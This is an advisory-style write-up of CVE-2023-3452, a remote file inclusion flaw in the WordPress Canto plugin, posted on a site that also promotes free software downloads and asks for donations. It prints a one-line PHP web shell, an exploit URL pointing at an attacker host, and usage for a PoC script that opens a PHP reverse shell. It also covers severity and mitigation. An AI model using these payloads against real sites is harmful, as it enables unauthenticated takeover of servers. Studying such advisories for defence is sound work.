# CVE‑2023‑3452: Remote File Inclusion to Remote Code Execution in WordPress Canto Plugin (≤ 3.0.4) ## Summary A critical vulnerability, identified as CVE-2023-3452, affects versions of the WordPress **Canto** plugin up to 3.0.4. The flaw arises from a lack of input validation in the `wp_abspath` parameter in the `includes/lib/download.php` file. If the PHP directive `allow_url_include` is enabled, this allows unauthenticated attackers to perform **Remote File Inclusion (RFI)**, which can be escalated to **Remote Code Execution (RCE)**. --- ## Technical Details ### Vulnerable Code The following line in the plugin's `download.php` file is the root of the issue: ```php require_once($_REQUEST['wp_abspath'] . '/wp-admin/admin.php'); ``` No sanitization or validation is applied to the `wp_abspath` parameter, allowing remote URLs to be included if `allow_url_include` is set to `On`. --- ## Exploitation Scenario An attacker can prepare a remote PHP file (e.g., `admin.php`) containing arbitrary code such as: ```php ``` They can then send a request like: ``` http://victim-site.com/wp-content/plugins/canto/includes/lib/download.php?wp_abspath=http://attacker-server.com&cmd=whoami ``` This causes the victim's server to fetch and execute the remote file, effectively running the attacker's commands. --- ## Proof-of-Concept (PoC) A Python exploit script is available on GitHub (by leoanggal1), which: - Hosts a local HTTP server to serve the malicious PHP file. - Sends the RFI payload to the target. - Allows execution of system commands or deployment of a PHP reverse shell. ### Example Usage ```bash # Run a simple command via web shell python3 CVE-2023-3452.py \ -u http://victim-site.com \ -LHOST attacker-ip \ -c 'id' # Upload a PHP reverse shell and wait for callback python3 CVE-2023-3452.py \ -u http://victim-site.com \ -LHOST attacker-ip \ -NC_PORT 4444 \ -s php-reverse-shell.php ``` --- ## Prerequisites for Exploitation - The server must have `allow_url_include = On` in its PHP configuration. - The attacker needs a publicly accessible HTTP server to host the malicious PHP code. --- ## Severity - **CVSS v3.1 Score**: 9.8 (Critical) - **Attack Vector**: Remote - **Authentication Required**: No - **Impact**: Full RCE --- ## Mitigation 1. **Update the Canto plugin** to version **3.0.5 or later**, which patches the vulnerability. 2. **Disable `allow_url_include`** in the PHP configuration: ``` allow_url_include = Off ``` 3. **Audit all plugin code** for any unsanitized usage of `require`, `include`, or their variants using user-supplied input. --- ## Conclusion CVE-2023-3452 is a critical vulnerability in the Canto plugin for WordPress. It results from insecure use of dynamic file inclusion based on user input, compounded by risky PHP configurations. Exploitation can lead to full remote code execution without authentication. It is essential for administrators to patch affected systems immediately and ensure server configurations do not allow URL-based file inclusion.

Support Crack-Vault and help us keep providing free tools. Every donation counts! (BTC) Address: bc1qhhva8uplmkaa3kkwxnux9t3y6l6kmhnwqzktzn

CVE‑2023‑3452

NikolasHume

CVE‑2023‑3452: Remote File Inclusion to Remote Code Execution in WordPress Canto Plugin (≤ 3.0.4)

Summary

A critical vulnerability, identified as CVE-2023-3452, affects versions of the WordPress Canto plugin up to 3.0.4. The flaw arises from a lack of input validation in the wp_abspath parameter in the includes/lib/download.php file. If the PHP directive allow_url_include is enabled, this allows unauthenticated attackers to perform Remote File Inclusion (RFI), which can be escalated to Remote Code Execution (RCE).

Technical Details

Vulnerable Code

The following line in the plugin's download.php file is the root of the issue:

require_once($_REQUEST['wp_abspath'] . '/wp-admin/admin.php');

No sanitization or validation is applied to the wp_abspath parameter, allowing remote URLs to be included if allow_url_include is set to On.

Exploitation Scenario

An attacker can prepare a remote PHP file (e.g., admin.php) containing arbitrary code such as:

<?php system($_GET['cmd']); ?>

They can then send a request like:

http://victim-site.com/wp-content/plugins/canto/includes/lib/download.php?wp_abspath=http://attacker-server.com&cmd=whoami

This causes the victim's server to fetch and execute the remote file, effectively running the attacker's commands.

Proof-of-Concept (PoC)

A Python exploit script is available on GitHub (by leoanggal1), which:

Hosts a local HTTP server to serve the malicious PHP file.
Sends the RFI payload to the target.
Allows execution of system commands or deployment of a PHP reverse shell.

Example Usage

# Run a simple command via web shell
python3 CVE-2023-3452.py \
  -u http://victim-site.com \
  -LHOST attacker-ip \
  -c 'id'

# Upload a PHP reverse shell and wait for callback
python3 CVE-2023-3452.py \
  -u http://victim-site.com \
  -LHOST attacker-ip \
  -NC_PORT 4444 \
  -s php-reverse-shell.php

Prerequisites for Exploitation

The server must have allow_url_include = On in its PHP configuration.
The attacker needs a publicly accessible HTTP server to host the malicious PHP code.

Severity

CVSS v3.1 Score: 9.8 (Critical)
Attack Vector: Remote
Authentication Required: No
Impact: Full RCE

Mitigation

Update the Canto plugin to version 3.0.5 or later, which patches the vulnerability.

Disable allow_url_include in the PHP configuration:

   allow_url_include = Off

Audit all plugin code for any unsanitized usage of require, include, or their variants using user-supplied input.

Conclusion

CVE-2023-3452 is a critical vulnerability in the Canto plugin for WordPress. It results from insecure use of dynamic file inclusion based on user input, compounded by risky PHP configurations. Exploitation can lead to full remote code execution without authentication. It is essential for administrators to patch affected systems immediately and ensure server configurations do not allow URL-based file inclusion.

📱

Download Now—Top Software, No Cost!